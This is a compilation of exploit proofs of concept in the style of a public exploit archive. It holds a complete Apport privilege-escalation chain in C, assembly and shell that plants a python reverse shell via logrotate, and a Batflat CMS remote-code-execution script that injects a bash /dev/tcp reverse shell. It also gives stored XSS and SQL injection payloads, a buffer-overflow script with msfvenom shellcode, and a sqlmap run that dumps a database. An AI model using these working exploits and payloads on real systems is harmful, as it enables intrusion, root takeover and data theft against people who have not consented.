Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23
Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30
# Tested on: Ubuntu

This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234.

# Setup
To compile the exploit code several packages are needed:
sudo apt-get install build-essential nasm gcc

# Compilation
make

# Run
./exploit.sh

The reverse shell will connect on the next execution of logrotate
nc -l -p 1234

## Makefile ##
# Builds the three pieces used by exploit.sh: the C driver (exploit), the
# process that gets crashed (crash, from crash.asm) and the decoy that is
# crashed first (decoy, from decoy.asm). The asm binaries are linked
# directly with ld, so they carry no libc.
.PHONY: all clean

CC=gcc
CFLAGS=
NASM=nasm
NASM_FLAGS=-f elf64
LD=ld

all: exploit crash decoy

exploit: exploit.c
	$(CC) -o $@ $< $(CFLAGS)
	chmod +x $@

crash: crash.o
	$(LD) $^ -o $@

decoy: decoy.o
	$(LD) $^ -o $@

crash.o: crash.asm
	$(NASM) $(NASM_FLAGS) $^

decoy.o: decoy.asm
	$(NASM) $(NASM_FLAGS) $^

clean:
	rm exploit decoy crash *.o

## crash.asm ##
section .data
; "message" is never referenced by the code below. It is data the process
; merely carries in memory: a complete logrotate.d stanza for
; /var/crash/test.log whose firstaction runs a python3 reverse shell to
; 127.0.0.1:1234 (34 = '"', 10 = '\n'). Presumably it is meant to end up in
; the core dump that exploit.c later reports as written into
; /etc/logrotate.d (cwd) — see exploit.sh's success check.
message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00
; Sleep argument. NOTE(review): nanosleep takes a struct timespec with two
; 64-bit fields; these two 32-bit dwords together form tv_sec = 4000000 and
; tv_nsec is read from whatever follows in .data — confirm it is zero/valid.
timeval:
tv_sec dd 0
tv_usec dd 0

section .text
global _start
_start:
    ; nanosleep(&timeval, NULL): park the process for ~46 days so it is still
    ; alive when exploit.c sends it SIGSEGV. 35 is nanosleep on x86-64.
    mov dword [tv_sec], 4000000
    mov dword [tv_usec], 0
    mov rax, 35
    mov rdi, timeval
    mov rsi, 0
    syscall

## decoy.asm ##
section .text
global _start
_start:
    ; Write to address 0: a deterministic SIGSEGV so Apport gets a crash
    ; report for this binary (exploit.sh also sends it SIGSEGV explicitly).
    mov dword [0], 0

## exploit.c ##
#include <unistd.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* How many PIDs short of the crash program's PID the fork loop stops, and
 * how many forks are spent afterwards trying to re-acquire that PID. */
#define PID_THRESHOLD (80)

/* Return the PID wrap-around value from /proc/sys/kernel/pid_max.
 * No error handling: a NULL from fopen() would be passed straight to
 * fread(). buf is not NUL-terminated; atoi() stops at the newline that
 * terminates the file's contents. */
int read_max_pid_file() {
    FILE *fd = 0;
    char buf[256];
    fd = fopen("/proc/sys/kernel/pid_max", "r");
    fread(buf, sizeof(buf), 1, fd);
    fclose(fd);
    return atoi(buf);
}

/* Open `path` for writing and write "A" plus its NUL (sizeof(buf) == 2) to it.
 * exploit.sh passes the FIFO it created in /var/crash as the path; opening a
 * FIFO for writing blocks until a reader has it open, which is what
 * synchronises this step with the Apport instance blocked on it. */
void write_to_fifo_file(char * path) {
    FILE *fd = 0;
    char buf[] = "A";
    fd = fopen(path, "w");
    fwrite(buf, sizeof(buf), 1, fd);
    fclose(fd);
    return;
}

/* Driver: argv[1] is the FIFO path (argc is never checked).
 * 1. start ./crash, 2. fork until the PID counter sits just below its PID,
 * 3. SIGSEGV it so Apport starts on it, then SIGKILL it, 4. fork until a
 * child gets the freed PID and exec sudo there through the spoofed-name
 * symlink, 5. write to the FIFO to release the Apport blocked on the decoy. */
int main(int argc, char *argv[]) {
    int iteration = 0;
    pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1;
    int current_pid = 0, max_pid = 0;   /* current_pid is never used */
    int total_pid = 0;                  /* never used */
    char *crash_argv[] = {"crash", NULL};
    /* sudo is exec'd via the symlink named in exec_buf; "-S sud" just makes
     * it start and wait for a password on stdin (killed by exploit.sh). */
    char *sudo_argv[] = {"sudo", "-S", "sud", NULL};
    char current_dir[1024] = {0};
    char exec_buf[2048] = {0};
    char crash_buf[2048] = {0};
    struct stat sb = {0};
    int null_fd = -1;

    /* Auto-reap the thousands of short-lived children forked below. */
    signal(SIGCHLD, SIG_IGN);
    getcwd(current_dir, sizeof(current_dir));
    /* "<cwd>/a\rUid: 0\rGid: 0" is the symlink to sudo that exploit.sh
     * creates. The carriage-return-separated "Uid: 0"/"Gid: 0" become part
     * of the process name; presumably a parser that splits on CR/LF then
     * reads a spoofed Uid/Gid for that process — confirm against the advisory. */
    snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0");
    snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash");
    /* Inherited by every child below, including the one that becomes the
     * sudo process; exploit.sh's success check looks for /etc/logrotate.d/core. */
    chdir("/etc/logrotate.d/");

    /* Start the crash program (crash.asm); it only sleeps until signalled. */
    if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR) {
        crash_pid = fork();
        if (0 == crash_pid) {
            execve(crash_buf, crash_argv, NULL);
            exit(0);
        } else if(-1 == crash_pid) {
            printf("[-] Could not fork program\n");
            return -1;
        }
    } else {
        printf("[-] Please check crash file executable.");
        return -1;
    }

    max_pid = read_max_pid_file();
    printf("[*] crash pid: %d\n", crash_pid);
    printf("[*] max pid: %d\n", max_pid);
    printf("[*] Creating ~%d PIDs\n", max_pid);
    printf("[*] Forking new processes\n");
    sleep(3);

    /* Burn through the PID space with forks that exit immediately, until
     * the last PID handed out is just below crash_pid (after wrap-around). */
    while (iteration < max_pid - 1) {
        /* Progress line every max_pid/5000 forks.
         * NOTE(review): integer division gives 0 — and a SIGFPE — if pid_max < 5000. */
        if( 0 == (iteration % (int)(max_pid / 5000))) {
            printf("\rIteration: %d/%d", iteration + 1, max_pid);
            fflush(stdout);
        }
        temp_pid = -1;
        temp_pid = fork();
        if (0 == temp_pid) {
            exit(0);
        } else if (temp_pid > 0) {
            iteration++;
            /* Stop PID_THRESHOLD short of crash_pid so that unrelated
             * processes started meanwhile cannot grab the target PID first. */
            if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD) {
                printf("\rIteration: %d/%d\n", iteration + 1, max_pid);
                fflush(stdout);
                printf("[+] less then %d pid from the target: last fork=%d , target: %d\n",
                       PID_THRESHOLD, temp_pid, crash_pid);
                break;
            }
        } else if (-1 == temp_pid) {
            printf("[-] Could not fork temp programs\n");
        }
    }

    printf("[*] Crashing the crash program\n");
    /* SIGSEGV: the kernel hands the crash to Apport (the "second" Apport;
     * the first is the one blocked on the decoy's FIFO, see exploit.sh). */
    kill(crash_pid, SIGSEGV);
    /* Original author's note: from now on the second Apport is running and
     * there are ~30 seconds to exploit it (timing not verifiable here). */
    sleep(5);
    printf("[*] Killing the crash program\n");
    kill(crash_pid, SIGKILL);
    sleep(3);

    /* crash_pid is free again: fork until a child receives exactly that PID
     * and have that child exec sudo through the spoofed-name symlink. */
    for(int i=0; i < PID_THRESHOLD ; i++) {
        spray_pid = fork();
        if (0 == spray_pid) {
            if (crash_pid == getpid()) {
                null_fd = open("/dev/null", O_WRONLY);
                dup2(null_fd, 1);
                dup2(null_fd, 2);
                close(null_fd);
                /* Goes to /dev/null: stdout was redirected two lines above. */
                printf("[+] Creating suid process\n");
                execve(exec_buf, sudo_argv, NULL);
            }
            exit(0);
        }
    }
    sleep(3);

    printf("[*] Writing to fifo file\n");
    /* NOTE(review): argv[1] is used without checking argc; running
     * ./exploit with no argument passes NULL to fopen(). */
    write_to_fifo_file(argv[1]);
    /* Original author's note: the first Apport is released now and the
     * second one resumes. */
    printf("[+] Wrote core file to cwd!\n");
    sleep(10); /* give the second Apport time to finish */
    return 0;
}

## exploit.sh ##
#!/bin/sh
set -e
echo "[*] Running exploit"
# The log named in crash.asm's logrotate stanza; logrotate needs it to exist.
touch /var/crash/test.log
ulimit -c unlimited
# NOTE(review): "~" inside double quotes is not expanded, so this test is
# always true. Harmless, because mkdir -p is idempotent.
if [ ! -d "~/.config/apport" ]; then
    echo "[*] Settings directory not exists"
    echo "[*] Creating settings directory"
    mkdir -p ~/.config/apport
fi
# Same quoting issue: always true, so the settings file is overwritten on
# every run. "unpackaged=true" presumably makes Apport handle crashes of
# binaries that belong to no package (./decoy, ./crash). The "\n" escapes
# rely on this sh's echo interpreting them (dash does; bash does not).
if [ ! -f "~/.config/apport/settings" ] ; then
    echo "[*] Settings file not exists"
    echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings
    echo "[+] Settings file created"
fi
# Build the report name Apport would use for the decoy
# (/var/crash/<exe path with "/" -> "_">.<uid>.crash) and pre-create it as a
# FIFO: the Apport instance handling the decoy's crash then blocks opening it
# until exploit.c writes to the FIFO.
DECOY_PATH=`realpath ./decoy`
MY_UID=`id -u`
DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'`
DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}"
if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then
    echo "[*] decoy crash exists deleting the file"
    rm $DECOY_CRASH_PATH
fi
mkfifo $DECOY_CRASH_PATH
echo "[+] FIFO file created"
# Crash the decoy (its only instruction segfaults anyway; the signal makes
# the timing explicit). Note the redirection order: stderr goes to the
# terminal, only stdout to /dev/null.
./decoy 2>&1 >/dev/null &
killall -SIGSEGV ./decoy
echo "[+] Decoy process created"
# Symlink sudo under a name that embeds CR-separated "Uid: 0"/"Gid: 0";
# python3 does the rename because the name contains carriage returns.
# exploit.c execs this path from the process that re-acquired the crashed PID.
SUDO_PATH=`which sudo`
ln -s $SUDO_PATH "linkchange"
python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')"
echo "[+] symlink to sudo created"
./exploit $DECOY_CRASH_PATH
rm $DECOY_CRASH_PATH
sleep 5
# Success indicator: a core file in /etc/logrotate.d (exploit.c's cwd).
if [ -f "/etc/logrotate.d/core" ] ; then
    echo "[*] Exploit succesfully finished"
else
    echo "[*] Exploit failed"
fi
# Kill the sudo process after second apport finished
kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'`
##
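#!/usr/bin/python3
# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734
"""Batflat CMS <= 1.3.6 authenticated RCE (CVE-2020-35734).

Flow: log in to /admin/, scrape the ``t=`` token from the dashboard, fetch
the add-user form to learn its action URL, create a user whose ``fullname``
is a PHP reverse-shell stub, then load the user-management page (the
advisory's trigger) so the stored value is executed by the server and a
shell connects back to <IP>:<PORT>.

Usage: python3 batpwnd.py <url> <username> <password> <IP> <PORT>
The base URL may be given with or without a trailing slash. Start the
listener (e.g. ``nc -lvnp <PORT>``) before running this.

Changes from the original one-shot script: the shebang is on line 1 (it was
buried below the header and therefore ineffective), regex lookups are
guarded so a failed login reports a readable error instead of an
AttributeError, and a missing trailing slash on <url> no longer produces
paths like "http://hostadmin/".
"""
import re
import sys
from time import sleep

import requests
from bs4 import BeautifulSoup
from termcolor import colored

HEADERS = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}

# Both regexes are applied to str(BeautifulSoup(...)), i.e. to the
# re-serialised markup, exactly as the original script did.
TOKEN_RE = r't=(.*?)">Add'
ACTION_RE = r'action="(.*?)"'


def build_payload(ip, port):
    """Return the PHP stub stored in ``fullname``: a bash reverse shell to ip:port.

    Args:
        ip: listener address, inserted verbatim.
        port: listener port (string), inserted verbatim.
    """
    return "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1'\");?>"


def extract(pattern, html, what):
    """Return group 1 of ``pattern`` in ``html`` or exit(1) with a readable error.

    ``what`` names the thing being looked for, for the error message. The
    most common cause of a miss is a failed login (the admin page is not
    served), so the message points there first.
    """
    match = re.search(pattern, html)
    if match is None:
        print(colored("[-] Could not find " + what + " - wrong credentials, URL or version?", "red"))
        sys.exit(1)
    return match.group(1)


def main(argv):
    """CLI entry point; ``argv`` is sys.argv (program name plus 5 arguments)."""
    print(colored('''###########################################################''',"red"))
    print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red"))
    print(colored('''###########################################################''',"red"))
    print("")
    if len(argv) != 6:
        print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
        print((colored("[~] Default credentials: admin/admin","red")))
        print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
        sys.exit(1)  # usage error: non-zero so wrappers can tell it apart from success

    url = argv[1]
    if not url.endswith("/"):
        url += "/"  # every request below appends "admin/..." to the base
    username, password, ip, port = argv[2], argv[3], argv[4], argv[5]

    session = requests.Session()

    # Authenticate. The login response itself is not inspected (its shape is
    # not known here); a failed login surfaces as a missing token below.
    print((colored("[+] Attempting user login","blue")))
    login_data = {
        "username": username,
        "password": password,
        "login": "",
    }
    session.post(url + "admin/", login_data, headers=HEADERS)
    sleep(0.5)

    # The admin pages carry a per-session "t=" token in their links.
    print((colored("[+] Retrieving the token","blue")))
    dashboard = session.get(url + "admin/", headers=HEADERS).content
    token = extract(TOKEN_RE, str(BeautifulSoup(dashboard, "lxml")), "the admin token")
    print((colored("[+] Token ID: " + token,"blue")))
    sleep(0.5)

    # Learn the add-user form's action URL instead of hard-coding it.
    print((colored("[+] Getting the add-user endpoint URL","blue")))
    form = session.get(url + "admin/users/add?t=" + token, headers=HEADERS).content
    add_user_url = extract(ACTION_RE, str(BeautifulSoup(form, "lxml")), "the add-user form action")
    sleep(0.5)

    # Create a user whose fullname is the PHP payload. Sent as multipart
    # (files=) like the browser does; each value is (filename=None, data).
    print((colored("[+] Adding pwnd user","blue")))
    payload = build_payload(ip, port)
    add_user = {
        "username": (None, "pwnd"),
        "fullname": (None, payload),
        "description": (None, "pwnd"),
        "email": (None, "[email protected]"),
        "password": (None, "pwnd123"),
        "access[]": (None, "users"),
        "save": (None, "Save")
    }
    session.post(add_user_url, headers=HEADERS, files=add_user)
    sleep(0.5)

    # Rendering the user list is what evaluates the stored fullname (per the
    # advisory). This request likely blocks for as long as the shell lives.
    print("")
    print((colored("[+] Triggering the shell. Go nuts!","green")))
    session.get(url + "admin/users/manage?t=" + token, headers=HEADERS)


if __name__ == "__main__":
    main(sys.argv)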
19. # Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-18 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html # Software: Comment System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/comment/index.php # Vulnerable Input Fields: Your Name: "><script>alert(document.cookie)</script> Comment: "><script>alert(document.cookie)</script> # Payload used: "><script>alert(document.cookie)</script> # POC: Submit the payload in the "Your Name" or "Comment" field. The value is stored and rendered back without encoding, so the script runs in the browser of every user who later loads http://localhost/comment/index.php, not only the submitter's — that is what makes this stored (persistent) rather than reflected XSS. # You will see your JavaScript code (XSS) executed.
20. # Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Anmol K Sachan # Vendor Homepage: https://www.peel.fr/ # Software Link: https://sourceforge.net/projects/peel-shopping/ # Software: PEEL SHOPPING 9.3.0 # Vulnerability Type: Stored Cross-site Scripting # Vulnerability: Stored XSS # Tested on Windows 10 XAMPP # This application is vulnerable to stored XSS. # Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php # Vulnerable parameter: 'Comments / Special Instructions :' # Payload used: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e # Note: this payload is a context-breaking polyglot — it closes style, title, textarea and script contexts and carries both an onclick and an SVG onload handler — so it fires wherever the stored value is reflected. # POC: submit the payload in the 'Comments / Special Instructions' field, then reload the same page: the stored value is rendered back and the JavaScript executes. # You will see your JavaScript code (XSS) executed.
21. # Exploit Title: Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-18 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection. # Vulnerable Page: http://localhost/CEE/adminpanel/admin/index.php # Payload used: Email => ' or 'x'='x Password => ' or 'x'='x # POC: Enter the payload in both the Email and Password fields of http://localhost/CEE/adminpanel/admin/index.php and submit the form. The leading quote closes the string literal in the login query and "or 'x'='x" makes the WHERE clause always true, so the application logs you straight into the Admin Panel without valid credentials (authentication bypass).
  22. # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.ddc-web.com/ # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414 # Version: 4.5.3 # Tested On: Windows 10 Enterprise (x64) # about Sofware: # dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort. # about ARINC 664-1: # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®). #!/usr/bin/env python # -*- coding: UTF-8 -*- import struct import binascii import os import sys #EAX : 00000000 #EBX : 00000000 #ECX : 42424242 #EDX : 77B96330 ntdll.77B96330 #EBP : 000A1328 #ESP : 000A1308 #ESI : 00000000 #EDI : 00000000 #EIP : 42424242 #EFLAGS : 00010246 #LastError : 00000000 (ERROR_SUCCESS) #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND) #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)! file = open("milstd1553result.txt", "w") junk = "\x41" * 600 align = "\x32" * 4 + "\x31" * 4 prop = "\x43" * 380 imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32" imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a" #EIP Overwrite junk value overwrite = "\x42" * 4 #Payload size: 29 bytes #Final size of py file: 160 bytes #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai buf = b"" buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33" buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9" buf += b"\x8b\x7c\x9c" win32 = junk + align + prop + imp + imp2 + overwrite + buf print len(win32) file.write(win32) file.close()
23. # Exploit Title: Beauty Parlour Management System 1.0 - 'sername' SQL Injection # Date: 19/2/2021 # Exploit Author: Thinkland Security Team # Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip # Version: V 1.0 # Tested on: Windows, XAMPP # Identify the vulnerability 1. go to http://localhost/bpms/admin/ and log in with your account (the injection is post-authentication) 2. then go to http://localhost/bpms/admin/edit-services.php?editid=17 3. Submit the edit form and save the captured request as 3.txt (the value recorded in sername below is an HTML/XSS probe; sqlmap appends its SQL payload after it, so answer "N" to the "inject inside boundaries" prompt) POST /bpms/admin/edit-services.php?editid=17 HTTP/1.1 Host: http://localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/bpms/admin/edit-services.php?editid=17 Cookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0 Upgrade-Insecure-Requests: 1 sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit= # Exploit Now you can exploit it using sqlmap: sqlmap -r file --batch --dbms=mysql --current-db example: sqlmap.py -r 3.txt --batch --dbms=mysql --current-db __H__ ___ ___[.]_____ ___ ___ {1.4.10.16#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:30:14 /2021-02-19/ [09:30:14] [INFO] parsing HTTP request from '3.txt' it appears that provided value for POST parameter 'sername' has boundaries. Do you want to inject inside? ('<img src%3D1 onerror%3Dalert(/xss*/)>') [y/N] N [09:30:14] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [09:30:14] [INFO] testing connection to the target URL [09:30:15] [INFO] testing if the target URL content is stable [09:30:15] [INFO] target URL content is stable [09:30:15] [INFO] testing if POST parameter 'sername' is dynamic [09:30:15] [WARNING] POST parameter 'sername' does not appear to be dynamic [09:30:15] [WARNING] heuristic (basic) test shows that POST parameter 'sername' might not be injectable [09:30:15] [INFO] testing for SQL injection on POST parameter 'sername' [09:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:30:15] [WARNING] reflective value(s) found and filtering out [09:30:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:30:16] [INFO] testing 'Generic inline queries' [09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:30:16] [WARNING] time-based comparison requires larger statistical model, please wait........ (done) [09:30:26] [INFO] POST parameter 'sername' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? 
[Y/n] Y [09:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:30:27] [INFO] checking if the injection point on POST parameter 'sername' is a false positive POST parameter 'sername' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: sername (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sername=<img src=1 onerror=alert(/xss/)>' AND (SELECT 3311 FROM (SELECT(SLEEP(5)))YaHW) AND 'HGFO'='HGFO&cost=1&submit= --- (note: only a time-based blind technique was confirmed, so data extraction is slow — one bit per request — and sensitive to network jitter) [09:30:42] [INFO] the back-end DBMS is MySQL [09:30:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [09:30:47] [INFO] fetching current database [09:30:47] [INFO] retrieved: [09:30:57] [INFO] adjusting time delay to 1 second due to good response times bpmsdb current database: 'bpmsdb' [09:31:15] [INFO] fetched data logged to text files under
24. # Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting # Date: 19/02/2021 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.opentext.com/ # Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management # Version: 20.3 ========================================================================================== 1.) Document version XSS ========================================================================================== A user with permission to create new document versions could store a malicious cross-site scripting payload through the version comment (the multipart field "comment" below, shown as the version description). The value was rendered by the server without output encoding, resulting in a stored XSS vulnerability. ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------20043647051137266192675354452 Content-Length: 2071 Origin: https://redacted Connection: close [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="func" doc.addversion2 -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="nodeID" 1125007 [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="comment" <svg/onload=alert()> -----------------------------20043647051137266192675354452 [snipped] ------------------------------------------------------------------------------------------ Any user who then opens the document's versions page executes the injected JavaScript in their own session.
An example URL will look like the following: ------------------------------------------------------------------------------------------ https://redacted/otcs/cs.exe?func=ll&objId=1125007&objAction=versions&nexturl=%2Fotcs%2Fcs%2Eexe%3Ffunc%3Dll%26objid%3D1121694%26objAction%3Dbrowse%26sort%3Dname ------------------------------------------------------------------------------------------ ========================================================================================== 2.) Project Banner XSS ========================================================================================== A project banner could be crafted in such a way that clicking it would result in the execution of user-defined JavaScript. The application did not validate the scheme of the user-supplied banner URL (IMG1_URL / IMG2_URL), so it could be set to "javascript:". The mixed-case "JaVaScRiPt:" spelling in the request below suggests a case-sensitive scheme check was being bypassed, though this is not confirmed; a correct fix is to allow-list schemes (http/https) after normalising case rather than to block "javascript". The request which saved the payload on the server looked like the following: ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 479 Origin: redacted Connection: close[snipped] func=ll&objAction=ConfigLookFeel&objId=1120281&currenttab=2&tab=1&roleid=0&newroleid=0&IMG1_ID=1129727&IMG1_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_ALT=THISBANNERWILLEXECUTEJAVASCRIPT&IMG1_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29&IMG2_ID=1129727&IMG2_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_ALT=THISONETOO&IMG2_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29 ------------------------------------------------------------------------------------------ Next a user would have to browse to the project
page and click on the project banner. ==========================================================================================
  25. # Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: https://github.com/monicahq/monica/releases # Version: Monica 2.19.1 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-27370 POST /people HTTP/1.1 Host: 192.168.99.162 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 199 Origin: http://192.168.99.162 Connection: close Referer: http://192.168.99.162/people/add Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=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%3D; 